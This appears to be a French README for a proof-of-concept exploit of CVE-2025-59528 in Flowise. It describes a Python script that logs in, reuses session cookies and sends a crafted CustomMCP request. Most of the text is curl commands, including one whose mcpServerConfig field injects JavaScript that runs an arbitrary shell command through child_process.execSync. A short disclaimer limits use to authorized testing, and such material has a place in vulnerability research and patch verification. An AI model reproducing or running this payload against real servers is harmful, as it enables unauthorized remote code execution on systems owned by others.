
CVE-2025-59528 Preuve de concept
Script Python de preuve de concept pour déclencher le chemin RCE CustomMCP de Flowise via POST /api/v1/node-load-method/customMCP.
⚠️ À des fins éducatives et de recherche en sécurité autorisée uniquement. L'exécution de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite de tester est illégale.
im-soohyun (Kim SooHyun)CVE-2025-595283.0.53.0.6poc.py : demande l'URL/IP de la machine, le protocole optionnel si hôte/IP nue utilisée, l'email, le mot de passe et la commande ; se connecte, réutilise les cookies, puis envoie une requête CustomMCP conçue et affiche le statut HTTP, les en-têtes et le corps de la réponse similaire à curl -iExécutez :
python3 poc.py
Ensuite fournissez :
10.10.11.10, http://10.10.11.10 ou https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'